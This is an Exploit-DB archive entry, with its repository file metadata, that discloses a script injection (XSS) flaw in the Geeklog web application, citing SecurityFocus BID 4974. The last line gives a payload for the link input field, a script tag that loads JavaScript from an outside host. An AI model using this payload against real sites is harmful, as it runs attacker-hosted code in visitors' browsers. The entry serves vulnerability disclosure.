exploit-db-mirror/platforms/php/webapps/21528.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

7 lines
No EOL
450 B
Text
Executable file

source: http://www.securityfocus.com/bid/4974/info
Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks.
Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website.
Link input($url) :<scriptsrc="http://forum.olympos.org/f.js">Alper</script>